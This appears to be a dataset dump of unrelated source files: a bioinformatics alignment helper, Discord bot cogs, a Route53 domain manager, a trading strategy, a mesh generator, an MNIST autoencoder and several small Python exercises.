by grouping continuous gap positons\n if len(temp_seq_gap_position) > 1:\n\n temp_seq_group_result = []\n for key, group in groupby(enumerate(temp_seq_gap_position),lambda x:x[0] - x[1]):\n\n group_result = tuple(map(itemgetter(1),group))\n temp_seq_group_result.append(group_result)\n\n elif len(temp_seq_gap_position) == 1:\n temp_seq_group_result = [(temp_seq_gap_position[0],)]\n else:\n temp_seq_group_result = []\n\n\n head_diff = 0\n end_diff = 0\n\n #real gaps are those not at the termini\n seq_real_gaps = []\n temp_seq_real_gaps = []\n for gap in seq_group_result:\n\n if 0 in gap:\n head_diff = -len(gap)\n elif len(aligned_seq[1])-1 in gap:\n end_diff = -len(gap)\n else:\n seq_real_gaps.append(gap)\n\n for gap in temp_seq_group_result:\n if 0 in gap:\n head_diff = len(gap)\n elif len(aligned_seq[1])-1 in gap:\n end_diff = len(gap)\n else:\n temp_seq_real_gaps.append(gap)\n\n return head_diff,end_diff, mutation, aligned_seq[0], seq_real_gaps, temp_seq_real_gaps\n\n\n\n\n alignments = pairwise2.align.globalms(seq,temp_seq, 2, -1, -2, -0.1) # score of identical characters is 2, penalize mismatch by score -1, penalize gap with score of -0.5 and penalize extending a gap by -0.1\n if alignments[0][2]< 0.5 * 2 * len(temp_seq): #sequence alignment score is < 60% of the identical matched template sequence. \n #print('poor_align')\n return None, None, None, None\n else:\n if len(alignments) > 1:\n #print('multiple alignments')\n template_gaps = float('inf')\n # if multiple alignment results, the one with least gaps is considered as final alignment results\n for i in alignments:\n head_diff,end_diff, mutation, aligned_seq,seq_real_gaps,temp_seq_real_gaps = check_gap_and_mut(i)\n if len(temp_seq_real_gaps) < template_gaps:\n alignment_correct = i\n template_gaps = len(temp_seq_real_gaps)\n\n else:\n alignment_correct = alignments[0]\n\n head_diff,end_diff, mutation, aligned_seq,seq_real_gaps,temp_seq_real_gaps = check_gap_and_mut(alignment_correct)\n\n mutation_new = []\n if len(temp_seq_real_gaps) > 0:\n\n\n gap_list = [pos for gap in temp_seq_real_gaps for pos in gap ]\n for j in mutation:\n shift_list = [pos for pos in gap_list if pos < int(j[1:-1])]\n shift = len(shift_list)\n mut_new = j[0] + str(int(j[1:-1]) - shift) + j[-1]\n mutation_new.append(mut_new)\n\n #print('warning: missing residues in template sequence!!!!!')\n else:\n mutation_new = mutation\n #if len(seq_real_gaps) > 0:\n #print('warning: missing residues in sequence')\n\n return head_diff, end_diff, mutation_new, aligned_seq\n\n","sub_path":"vs_pfm/data/pdb_info.py","file_name":"pdb_info.py","file_ext":"py","file_size_in_byte":33357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510081377","text":"from BaseStrategy import BaseStrategy\nimport numpy as np\nimport datetime\n\nclass SimpleStrategy(BaseStrategy):\n def __init__(self, signal,price):\n \"\"\"\n Constructor of the class\n :param signal:\n \"\"\"\n self.signal= np.array(signal)\n self.length = signal.size\n self.__time__ = signal.index\n self.price = price\n\n def generate_position(self):\n \"\"\"\n Generate signal according strategy:\n :return: position\n \"\"\"\n curr_pos = 0\n position = np.zeros(self.length)\n \n for i in range(self.length):\n if self.signal[i]==np.sign(curr_pos)*(-1):\n position[i]=self.signal[i]-curr_pos\n curr_pos = self.signal[i]\n else:\n position[i]=self.signal[i]\n curr_pos+=self.signal[i]\n return position\n\n #def get_time_stamp(self):\n #return self.__time__\n\n #def get_prices(self):\n #return self.__bars__\n\n\n\n","sub_path":"Strategy/SimpleStrategy.py","file_name":"SimpleStrategy.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377062613","text":"import aiohttp\nimport io\nimport re\n\nimport discord\nfrom discord.ext import commands\nimport html2text\nimport lxml.html\nfrom PIL import Image\n\nimport chickensmoothie as cs\n\n\nclass News(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.group(aliases=['announce', 'announcement'])\n @commands.guild_only()\n async def news(self, ctx):\n pass\n\n @news.command()\n @commands.guild_only()\n async def on(self, ctx):\n pass\n\n @news.command()\n @commands.guild_only()\n async def off(self, ctx):\n pass\n\n @news.command()\n @commands.guild_only()\n async def latest(self, ctx):\n news_articles = await cs.get_announcements() # Get the HTML list of all the news articles\n latest = news_articles[0] # Get the latest (first) news\n post_date = latest.getparent().getprevious().text # Get the news post date\n\n image_link = None\n image_list = None\n multiple_images = False\n canvas = None\n if latest.find('a/img[@alt=\"Image\"]') is not None: # If news has click-able images\n if len(latest.findall('a/img[@alt=\"Image\"]')) == 1: # If there is only 1 image\n image_tag = latest.find('a/img[@alt=\"Image\"]') # Get the 'img' tag\n image_link = image_tag.xpath('@src')[0] # Extract image link for use in embed later\n parent = image_tag.getparent() # Get parent tag of 'img', which is 'a' tag\n latest.remove(parent) # Remove the 'a' tag so it won't be converted to Markdown\n else: # If there is more than 1 image\n image_list = latest.findall('a/img[@alt=\"Image\"]') # Get the links to all the images\n multiple_images = True\n elif latest.find('img[@alt=\"Image\"]') is not None: # If the news has static images instead\n if len(latest.findall('img[@alt=\"Image\"]')) == 1: # If there is only 1 image\n image_tag = latest.find('img[@alt=\"Image\"]') # Get the 'img' tag\n image_link = image_tag.xpath('@src')[0] # Extract image link for use in embed later\n latest.remove(image_tag) # Remove the 'img' tag so it won't be parsed later\n else: # If there is more than 1 image\n image_tags = latest.findall('img[@alt=\"Image\"]') # Get all image tags\n image_links = [element.xpath('@src')[0] for element in image_tags] # Get the links to the image\n image_links = [url.replace('//', 'https://') for url in image_links] # Replace relative links with absolute links\n\n image_list = []\n async with aiohttp.ClientSession() as session:\n for link in image_links:\n async with session.get(link) as response:\n connection = await response.read()\n image_list.append(io.BytesIO(connection)) # Convert the images into bytes\n multiple_images = True\n\n if multiple_images: # If there are multiple images\n pil_images = list(map(Image.open, image_list)) # Open all byte images as PIL images\n\n current_width = 0\n current_heights = []\n for image in pil_images:\n current_width += image.width\n current_heights.append(image.height)\n max_height = max(current_heights) # Get the height of the tallest image\n\n x_offset = 10 # The spacing between images\n canvas_width = current_width + (x_offset * len(pil_images))\n canvas_height = max_height\n\n canvas = Image.new('RGBA', (canvas_width, canvas_height)) # Create an empty RGBA image\n current_x = 0\n for image in pil_images:\n canvas.paste(image, (current_x, (max_height - image.height)), image)\n current_x += image.width + x_offset\n\n text = lxml.html.tostring(latest) # Get the source HTML of the news article\n text_decoded = text.decode('utf-8') # Decode into UTF-8\n\n bold_span_tags = re.findall(r'(([\\w\\W]+?))', text_decoded) # Find all tags used to bold text\n if bold_span_tags: # If there are bolded text\n for tag in bold_span_tags:\n text_decoded = text_decoded.replace(tag[0], f'%@^{tag[1]}%@^') # Change the tag to a temporary name\n\n emoji_list = re.findall(r'\\s*', text_decoded) # Check if there are emojis in the news article\n if emoji_list: # If there are emojis\n for emoji in emoji_list:\n text_decoded = text_decoded.replace(emoji, '') # Remove the emoji\n\n text_decoded = text_decoded.replace('//', 'https://') # Replace all relative links to prefix with HTTPS\n links = set(re.findall(r'href=\"(.*?)\"', text_decoded)) # Get all href links\n for link in links:\n text_decoded = text_decoded.replace(link, f'https://www.chickensmoothie.com{link}') # Prepend Chicken Smoothie base URL\n\n content = html2text.html2text(text_decoded) # Convert remaining HTML into Markdown\n\n content = content.replace(' \\n', '$#@') # Fix up broken newlines\n content = content.replace('\\n', ' ')\n content = content.replace('$#@', '\\n')\n content = content.replace('%@^', '**') # Replace temporary span tags to **\n content = content.replace('\\n\\n\\n', '\\n') # Remove duplicate newlines\n\n links = re.findall(r'\\(http[s]*[\\w\\W]+?\\)', content) # Get all links in the Markdown\n for link in links:\n fixed_link = link.replace(' ', '') # Remove any spacing in them\n content = content.replace(link, fixed_link)\n\n # 11) Send embed\n embed = discord.Embed(title=post_date, description=content, colour=0x4ba139) # Create embed\n if multiple_images: # If there are multiple images\n output_buffer = io.BytesIO() # Convert the PIL output into bytes\n canvas.save(output_buffer, 'png') # Save the bytes as a PNG format\n output_buffer.seek(0) # Move the 'cursor' back to the start\n await ctx.send(embed=embed, file=discord.File(fp=output_buffer, filename='news.png')) # Upload the file to the channel where message came from\n elif image_link is not None: # If image exists in news\n embed.set_image(url=f'https:{image_link}') # Set embed image\n await ctx.send(embed=embed) # Send message\n else:\n await ctx.send(embed=embed) # Send message\n\n\ndef setup(bot):\n bot.add_cog(News(bot))\n","sub_path":"cogs/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3833397","text":"'''\n Write a program to calculate average marks of five inputted marks.\n\n'''\nmarks_data = []\nsub_count = 5;\ndef getData():\n for i in range(sub_count):\n inp = float(input(\"Enter the marks: \"))\n if 0<=inp<=100:\n marks_data.append(inp)\n else:\n print(\"Invalid marks entered\")\n\ndef calData():\n l_marks_data = len(marks_data)\n calc = 0;\n if l_marks_data == 5:\n for i in marks_data:\n calc = calc + i\n print(f\"Average of marks entered is: {calc/l_marks_data}\")\n else:\n print(\"Insufficient list of marks!\")\n\nif __name__ == \"__main__\":\n getData()\n calData()\n ","sub_path":"assignment4/average.py","file_name":"average.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263361297","text":"# https://codechalleng.es/bites/180/\n\nfrom collections import defaultdict\n\n# fake data from https://www.mockaroo.com\ndata = \"\"\"last_name,first_name,country_code\nWatsham,Husain,ID\nHarrold,Alphonso,BR\nApdell,Margo,CN\nTomblings,Deerdre,RU\nWasielewski,Sula,ID\nJeffry,Rudolph,TD\nBrenston,Luke,SE\nParrett,Ines,CN\nBraunle,Kermit,PL\nHalbard,Davie,CN\"\"\"\n\n\ndef group_names_by_country(data: str = data) -> defaultdict:\n countries = defaultdict(list)\n for line in data.split('\\n'):\n last_name, first_name, country = line.split(',')\n countries[country].append(f\"{first_name} {last_name}\")\n countries.pop('country_code', None)\n return countries\nif __name__ == '__main__':\n group_names_by_country(data)\n","sub_path":"bites/bite180_names.py","file_name":"bite180_names.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"27691819","text":"import discord\nimport asyncio\nfrom logger import log\n\n\nasync def ex(args, message, client, invoke):\n author = message.author.name\n channel = message.channel.__str__()[20:]\n if author != channel:\n try:\n ammount = int(args[0]) + 1 if len(args) > 0 else 2\n except:\n await client.send_message(message.channel, embed=discord.Embed(color=discord.Color.red(), description=\"Please enter another value than %s\" % ammount))\n return\n\n messages = []\n async for m in client.logs_from(message.channel, limit=ammount):\n messages.append(m)\n\n await client.delete_messages(messages)\n\n return_msg = await client.send_message(message.channel, embed=discord.Embed(color=discord.Color.blue(), description=\"Cleared %s message(s).\" % ammount))\n await asyncio.sleep(4)\n await client.delete_message(return_msg)\n else:\n await client.send_message(message.author, embed=discord.Embed(color=discord.Color.red(), description=\"Can't delete direct messages!\"))\n log(\"Could not clear message(s)!\", \"error\")\n","sub_path":"commands/cmd_clear.py","file_name":"cmd_clear.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39017480","text":"# from openpyxl import Workbook\n# wb = Workbook() # 새 워크북 생성\n# ws = wb.active\n# ws.title = \"NadoShee\"\n# ws.sheet_properties.tabColor = \"ff66ff\"\n# for x in range (1,11):\n# c= ws.cell(row = x, column = 1, value = 4)\n# print (c.value)\n# print(ws.max_row)\n\n# wb.save(\"sample.xlsx\")\n# wb.close()\n\nimport glob\nfilelocation = input(\"위치를적어주세요\")\nfiletype = input(\"파일유형 적어주세요\")\nmyList = glob.glob(filelocation + \"\\*.\" + filetype)\nif not myList:\n fileresult = input(\"잘못되었습니다\")\nelse:\n print (*myList, sep = \"\\n\")\n fileresult = input(\"여기있습니다\") \n\n# print (os.path.abspath(\"17194.xls\"))\n\n# 어떤 폴더에 어떤파일들이 있는지 알려주는 프로그램\n\n#C:\\Users\\Dave\\Documents\\정석윤\\9. 매크로 프로젝트\\gunsan\\*.xls\n\n#my testbed for codingxls\n","sub_path":"rpa_basic/1_excel/1_create_file.py","file_name":"1_create_file.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3209459","text":"\"\"\"Class for Route53 domains.\"\"\"\n\n\nclass DomainManager:\n \"\"\"Manage a Route53 domain.\"\"\"\n\n def __init__(self, session):\n \"\"\"Create DomainManager object.\"\"\"\n self.session = session\n self.route53_client = session.client('route53')\n\n def find_hosted_zone(self, domain_name):\n \"\"\"Find a hosted zone of the domain.\"\"\"\n paginator = self.route53_client.get_paginator('list_hosted_zones')\n\n for page in paginator.paginate():\n for zone in page['HostedZones']:\n if domain_name.endswith(zone['Name'][:-1]):\n return zone\n\n return None\n\n def create_s3_domain_record(self, zone, domain_name, endpoint):\n \"\"\"Create an A record for the domain name.\"\"\"\n return self.route53_client.change_resource_record_sets(\n HostedZoneId=zone['Id'],\n ChangeBatch={\n 'Comment': 'Created by boto3 lib',\n 'Changes': [{\n 'Action': 'UPSERT',\n 'ResourceRecordSet': {\n 'Name': domain_name,\n 'Type': 'A',\n 'AliasTarget': {\n 'HostedZoneId': endpoint.zone,\n 'DNSName': endpoint.host,\n 'EvaluateTargetHealth': False\n }\n }\n\n }]\n }\n\n )\n\n def create_cf_domain_record(self, zone, domain_name, cf_domain):\n \"\"\"Create an domain record in zone for domain_name.\"\"\"\n print(zone, domain_name, cf_domain)\n return self.route53_client.change_resource_record_sets(\n HostedZoneId=zone['Id'],\n ChangeBatch={\n 'Comment': 'Created by boto3 lib',\n 'Changes': [{\n 'Action': 'UPSERT',\n 'ResourceRecordSet': {\n 'Name': domain_name,\n 'Type': 'A',\n 'AliasTarget': {\n 'HostedZoneId': 'Z2FDTNDATAQYW2',\n 'DNSName': cf_domain,\n 'EvaluateTargetHealth': False\n }\n }\n\n }]\n }\n\n )\n","sub_path":"scripts/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"378424670","text":"# coding=utf-8\nimport unicodedata\nclass config_predict(object):\n def __init__(self,model_config='', doPredict = [1,1,1,1]): #__init__() 是类的初始化方法;它在类的实例化操作后 会自动调用,不需要手动调用;\n # 设置属性\n self.stopwords = [\" \", \" \", \" \", \",\", \",\", \".\", \"。\", \"、\", \"!\", \"!\", \"?\", \"?\", \";\", \";\", \"~\", \"~\", \"·\", \"·\", \".\", \"…\", \"-\",\n \"#_\", \"—\", \"+\", \"=\", \"'\", \"\\\"\", \"‘\", \"’\", \"“\", \"”\", \"*\", \"&\", \"^\", \"%\", \"$\", \"/\", \"\\\\\", \"@\"]\n self.stopwords,self.map_e2z = self.addStopwords()\n self.blackwords = ['自杀','死','火葬','我是你爸爸','我是你妈妈']\n self.specialwords_pre = ['祝福', '祝愿', '预祝']\n self.specialwords_gen = ['生日', '新年', '新春', '春节', '节日', '元旦']\n self.singlewords = ['哈','啊','哦','哦','呵','嘿','哎','哼']\n self.removed_words = ['⊙']\n self.punc_end = '.?!。?!》>'\n self.path_HighFreqWords = '../data/words_highFreq.txt'\n self.HighFreqWords = self.getHFW()\n self.min_contenlen = 8\n self.rate_gen2inp = 1.4\n self.batchGenerating = True\n self.max_nb_sents=4\n self.gpus = ['5','6','7']\n self.style = ['poem','prose','gou']\n if len(model_config)==0:\n self.model_configs = ['demo_config/config_poem.json','demo_config/config_godText_small_finetune_merged.json',\n 'demo_config/config_dabaigou.json']\n else:\n if type(model_config)==list:\n self.model_configs = model_config\n else:\n self.model_configs = [model_config]\n self.predict_nums = [4, 8, 8, 5]\n self.tags = ['(诗)', '(文)', '(大白狗)', '(句联想)']\n self.doPredict = [t==1 for t in doPredict]\n self.rmHFW = [False, False, True, False]\n self.maxNext_JLX = 3\n self.path_JLX_next = 'model/nnlm/D_next.json'\n self.path_JLX_simi = 'model/nnlm/D_simi.json'\n self.prefixTrim = True\n self.useThread = True\n self.fast_pattern = True\n self.repetition_penalty = [1.5,1.2,1.2]\n self.temperature = [0.7,0.6,0.5]\n self.length = [64,30,30]\n self.resort = True\n def addStopwords(self):\n punc_zh = \"!?。"#$%&'()*+,-/:;<=>@[\]^_`{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘’‛“”„‟‧﹏.…\"\n punc_en = unicodedata.normalize('NFKC', punc_zh[:-1]) + unicodedata.normalize('NFKC', punc_zh[-1])[-1]\n punc_zh = punc_zh + '。'\n punc_en = punc_en + '。'\n map_e2z = {punc_en[i]: punc_zh[i] for i in range(len(punc_en))}\n stopwords = self.stopwords + list(punc_zh) + list(punc_en)\n stopwords = list(set(stopwords))\n return stopwords,map_e2z\n def getHFW(self):\n with open(self.path_HighFreqWords,'r') as f:\n s = f.read().strip().split('\\n')\n return s\n","sub_path":"test_online/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"33882772","text":"#!/usr/bin/env python3\n# coding utf-8\n\nimport cProfile\n\nimport copy\nimport math\nimport numpy as np\nimport random\nfrom datetime import datetime\n\nimport pprint\npprint = pprint.PrettyPrinter(indent=4).pprint\n\nfrom Classes.MatricesPrinter import MatricesPrinter\nfrom Classes.Options import Options\nfrom Classes.Point import Point\nfrom Classes.PolygonCylinderInTheShell import PolygonCylinderInTheShell\nfrom Classes.PropertiesPrinter import PropertiesPrinter\nfrom Classes.Vector import Vector\n\nfrom functions.boxCross import boxCross\nfrom functions.boxCrossByDiskInTheShell import boxCrossByDiskInTheShell\nfrom functions.checkPercolation import checkPercolation\nfrom functions.diskDiskInTheShellCross import diskDiskInTheShellCross\nfrom functions.disksCross import disksCross\nfrom functions.disksInTheShellCross import disksInTheShellCross\n\n\ndef mainExfoliation():\n o = Options()\n maxhMatrix = o.getProperty('maxh_m')\n maxhFiller = o.getProperty('maxh_f')\n maxhShell = o.getProperty('maxh_sh')\n desiredDisksNumber = int(o.getProperty('numberOfDisks'))\n maxAttempts = o.getProperty('maxAttempts')\n pcs = []\n l = o.getProperty('cubeEdgeLength')\n #cellString = 'solid cell = orthobrick(0, 0, 0;'\n #cellString += ' {0}, {0}, {0});\\n'.format(l)\n cellString = 'solid cell = plane(0, 0, {0}; 0, 0, {0})'.format(l)\n cellString += ' and plane(0, {0}, 0; 0, {0}, 0)'.format(l)\n cellString += ' and plane({0}, 0, 0; {0}, 0, 0)'.format(l)\n cellString += ' and plane(0, 0, 0; 0, 0, -{0})'.format(l)\n cellString += ' and plane(0, 0, 0; 0, -{0}, 0)'.format(l)\n cellString += ' and plane(0, 0, 0; -{0}, 0, 0);\\n'.format(l)\n matrixString = 'solid matrix = cell'\n attempt = 0\n v = o.getProperty('verticesNumber')\n r = o.getProperty('polygonalDiskRadius')\n h = o.getProperty('polygonalDiskThickness')\n ready = 0\n tmpPcs = []\n while ready < desiredDisksNumber and attempt < maxAttempts:\n attempt += 1\n if len(pcs) > 0:\n name = int(pcs[len(pcs) - 1].number()) + 1\n pc = PolygonCylinderInTheShell(r, h, name, int(v))\n else:\n pc = PolygonCylinderInTheShell(r, h, 0, int(v))\n random.seed(datetime.now())\n alpha = random.random() * 2 * math.pi\n beta = random.random() * 2 * math.pi\n gamma = random.random() * 2 * math.pi\n # rotate around 0x\n pc.changeByMatrix(np.array([\n [1, 0, 0, 0],\n [0, math.cos(alpha), -math.sin(alpha), 0],\n [0, math.sin(alpha), math.cos(alpha), 0],\n [0, 0, 0, 1]\n ]))\n # rotate around 0y\n pc.changeByMatrix(np.array([\n [math.cos(beta), 0, math.sin(beta), 0],\n [0, 1, 0, 0],\n [-math.sin(beta), 0, math.cos(beta), 0],\n [0, 0, 0, 1]\n ]))\n # rotate around 0z\n pc.changeByMatrix(np.array([\n [math.cos(gamma), -math.sin(gamma), 0, 0],\n [math.sin(gamma), math.cos(gamma), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]\n ]))\n # translate into random point of the box\n dx = l * random.random()\n dy = l * random.random()\n dz = l * random.random()\n pc.changeByMatrix(np.array([\n [1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [dx, dy, dz, 1]\n ]))\n tmpPcs = []\n copiedCount = 0\n pcToCheck = None\n for ix in [-1, 0, 1]:\n for iy in [-1, 0, 1]:\n for iz in [-1, 0, 1]:\n pc1 = copy.copy(pc)\n pc1.setCopied(copiedCount)\n copiedCount += 1\n pc1.changeByMatrix(np.array([\n [1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [ix * l, iy * l, iz * l, 1]\n ]))\n tmpPcs.append(pc1)\n if (ix, iy, iz) == (0, 0, 0):\n pcToCheck = pc1\n flag = 0\n for oldPc in pcs:\n #for pc in tmpPcs:\n # if disksCross(oldPc, pc) or\\\n # disksCross(pc, oldPc) or\\\n # diskDiskInTheShellCross(oldPc, pc) or\\\n # diskDiskInTheShellCross(pc, oldPc):\n # flag = 1\n # break\n if disksCross(oldPc, pc) or\\\n disksCross(pc, oldPc) or\\\n diskDiskInTheShellCross(oldPc, pc) or\\\n diskDiskInTheShellCross(pc, oldPc):\n flag = 1\n break\n if flag != 1:\n ready += 1\n for pc in tmpPcs:\n pcs.append(pc)\n \n toPop = []\n for i, pc in enumerate(pcs):\n c = pc.c()\n if not 0 < c.x() < l or not 0 < c.y() < l or not 0 < c.z() < l:\n if not boxCrossByDiskInTheShell(pc):\n toPop.append(i)\n for i in toPop[::-1]:\n pcs.pop(i)\n s = 'End of attempt {0} ready {1} of {2}'\n print(s.format(attempt, ready, desiredDisksNumber))\n print('Checking for percolation len is {}'.format(len(pcs)))\n for pc in pcs:\n print(pc)\n checkPercolation(pcs)\n s = ' and not filler and not shell;\\ntlo matrix -transparent -maxh={0};\\n'\n matrixString += s.format(maxhMatrix)\n f = open(o.getProperty('fname'), 'w')\n f.write('algebraic3d\\n')\n f.write(cellString)\n if len(pcs) > 0:\n fillerString = 'solid filler = cell and ('\n shellString = 'solid shell = cell and ('\n for i, pc in enumerate(pcs):\n pc.printToCSG(f)\n if i != 0:\n fillerString += ' or polygonalDisk{0}'.format(pc.number())\n shellString += ' or pdShell{0}'.format(pc.number())\n else:\n fillerString += 'polygonalDisk{0}'.format(pc.number())\n shellString += 'pdShell{0}'.format(pc.number())\n fillerString += ');\\ntlo filler -maxh={0};\\n'.format(maxhFiller)\n s = ') and not filler;\\ntlo shell -maxh={0};\\n'\n shellString += s.format(maxhShell)\n f.write(fillerString)\n f.write(shellString)\n f.write(matrixString)\n print('Volume fraction is {}'.format(ready * math.pi * r**2 * h / l**3))\n mp = MatricesPrinter(pcs)\n pp = PropertiesPrinter(pcs)\n\n \nmainExfoliation()\n","sub_path":"mainExfoliationShellPeriodic.py","file_name":"mainExfoliationShellPeriodic.py","file_ext":"py","file_size_in_byte":7017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600218024","text":"import bmm.parameters as para\n\nenv_type = para.game_version\nalgorithm_type = para.algorithms\npolicy_type = para.policy_type\ngame_type = para.game_type\npath = para.DataSavePath\n\nresult_dir = 'results-{0}-{1}-{2}-{3}'.format(env_type, algorithm_type, policy_type, game_type)\n\n\nimport numpy as np\nimport pandas as pd\n\nwindow_size = 100\nadjustment_rate_plot_range = 1\nwindow = 995000\nprint_episode = para.print_episode\n\n# Load Q value table\nplot_Q_list = [] # Initialize the Q_list for plot\nQ_table = np.load(path + 'numpy_data/' + result_dir + '/' + 'q_table_' + str(print_episode) + \".npy\") # Load Q_table\nPE_rows = np.array(np.arange(para.state_limits)) # States Prediction errors\nAR_cols = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]) # Actions: adjustment rate\n\n# Result save path\nsave_path = path + 'plot_results/' + result_dir\n\nimport numpy as np\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport os\nimport matplotlib\nimport numpy as np\nimport matplotlib.cm as cm\nimport matplotlib.mlab as mlab\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport matplotlib.pyplot as plt\n\nmatplotlib.rcParams['xtick.direction'] = 'out'\nmatplotlib.rcParams['ytick.direction'] = 'out'\n\ndelta = 0.025\nx = PE_rows\ny = AR_cols\n\n\nX, Y = np.meshgrid(x, y)\n\nZ = np.array(Q_table)\nZ = np.transpose(Z)\n\nfig = plt.figure()\nplt.rc('font', family='serif', size=13)\n\nax = fig.gca(projection = '3d')\nsurf=ax.plot_surface(Y, X, Z, rstride=1, cstride=1,cmap=cm.coolwarm,\n linewidth=0, antialiased=True)\nax.contour(Y, X, Z, zdir='z', offset=np.min(Z)-1, cmap=cm.coolwarm)\nax.set_xlabel('Adjustment Rate')\nif para.game_version == \"OutlierGame-v1\":\n ax.set_ylabel('State')\nelif para.game_version == \"OutlierGame-v2\":\n ax.set_ylabel('State')\nax.set_zlabel('Q value')\nax.zaxis.set_major_locator(LinearLocator(6))\nax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\nfig.colorbar(surf, shrink=0.5, aspect=5) # colour bar\nax.set_zlim([np.min(Z)-1,0])\n\n\n\nplt.show()","sub_path":"bmm/plot_code/plot_3d.py","file_name":"plot_3d.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479071961","text":"\"\"\"\r\nDefinition of TreeNode:\r\nclass TreeNode:\r\n def __init__(self, val):\r\n self.val = val\r\n self.left, self.right = None, None\r\n\"\"\"\r\nclass Solution:\r\n \"\"\"\r\n @param root: The root of binary tree.\r\n @return: An integer\r\n \"\"\" \r\n def maxDepth(self, root):\r\n if root is None:\r\n return 0\r\n \r\n self.depth = 0\r\n self.dfs(root, 1)\r\n return self.depth\r\n \r\n def dfs(self, node, height):\r\n if node.left is None and node.right is None:\r\n self.depth = max(self.depth, height)\r\n return\r\n if node.left:\r\n self.dfs(node.left, height + 1)\r\n if node.right:\r\n self.dfs(node.right, height + 1)","sub_path":"src/MaximumDepthOfBinaryTree.py","file_name":"MaximumDepthOfBinaryTree.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"481493648","text":"\nimport os\nos.environ['THEANO_FLAGS'] = 'device=gpu, floatX=float32'\nimport theano\n\nimport numpy as np\nimport numpy.random as npr\n\nimport matplotlib.pyplot as plt\nplt.ion()\n\nimport deepnet\nimport deepnet.autoencoder\nfrom deepnet.autoencoder import Autoencoder, SparseAutoencoder\nfrom deepnet.autoencoder import SparseTrainer, sgd\nfrom deepnet.functions import Linear, NoisyLIFApprox\nimport deepnet.image_tools\n\nfrom skdata.mnist.dataset import MNIST\nmnist = MNIST()\nmnist.meta # accessing this forces data arrays to be built\n\nimages = mnist.arrays['train_images'].astype('float32')\nimages = (images - images.mean()) / images.std()\n\nlabels = np.asarray([m['label'] for m in mnist.meta if m['split'] == 'train'])\nimshape = images.shape[1:]\n\nplt.figure(1)\nplt.clf()\ndeepnet.image_tools.tile(images, rows=5, cols=10)\n\n################################################################################\n### train one layer\n\n# loadfile = None\nloadfile = 'mnist_layer.pkl'\n\nif loadfile is None or not os.path.exists(loadfile):\n\n linear = Linear(slope=1.0)\n noisylif = NoisyLIFApprox(\n tRef=0.02, tauRC=0.06, alpha=10.0, xint=-0.5, amp=1./41, sigma=0.05)\n\n # layer = SparseAutoencoder(visshape=imshape, hidshape=(50,50),\n # rfshape=(9,9), f=noisylif, g=linear)\n layer = SparseAutoencoder(visshape=imshape, hidshape=(40,40),\n rfshape=(9,9), f=noisylif, g=linear)\n\n if loadfile is not None:\n layer.tofile(loadfile)\nelse:\n layer = deepnet.CacheObject.fromfile(loadfile)\n\n################################################################################\ntrain_params = {'rho': 0.01, 'lamb': 25, 'noise_std': 0.2}\ntrainer = SparseTrainer(layer, **train_params)\n\nsgd(trainer, images, nepochs=30, rate=0.05)\n\nif 0:\n ### untied training\n sgd(trainer, images, nepochs=1, rate=0.05)\n layer.untie()\n\n trainer = SparseTrainer(layer, **train_params)\n sgd(trainer, images, nepochs=30, rate=0.05)\n\nresults = layer.compVHV(images)\n\nplt.figure(1)\nplt.clf()\ndeepnet.image_tools.compare([images, results], vlims=(-1,1))\n","sub_path":"examples/mnist_layer.py","file_name":"mnist_layer.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"551852910","text":"#newlist = [*expression* for item in iterable if condition == True]\n\ntemps = [221, 234, 340, 230]\n\nnew_temps = [temp / 10 for temp in temps] #new way using list comprehension\n\n''' new_temps = []\nfor temp in temps:\n new_temps.append(temp / 10)''' #old way using a for loop\n\nprint(new_temps)\n\n\n\n\n\ntemps1 = [221, 234, 340, -9999, 230]\nnew_temps1 = [temp / 10 for temp in temps1 if temp != -9999]\nprint(new_temps1)\n\n\n\n\n\n#if / else list comprehension where if/else goes in between expression and \"for\" statement\ntemps2 = list(temps1)\nnew_temps2 = [temp / 10 if temp != -9999 else 0 for temp in temps2] # -9999 is replaced by 0\nprint(new_temps2)\n","sub_path":"Python Tutorial/python_basics/list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86639866","text":"from decimal import Decimal\nfrom 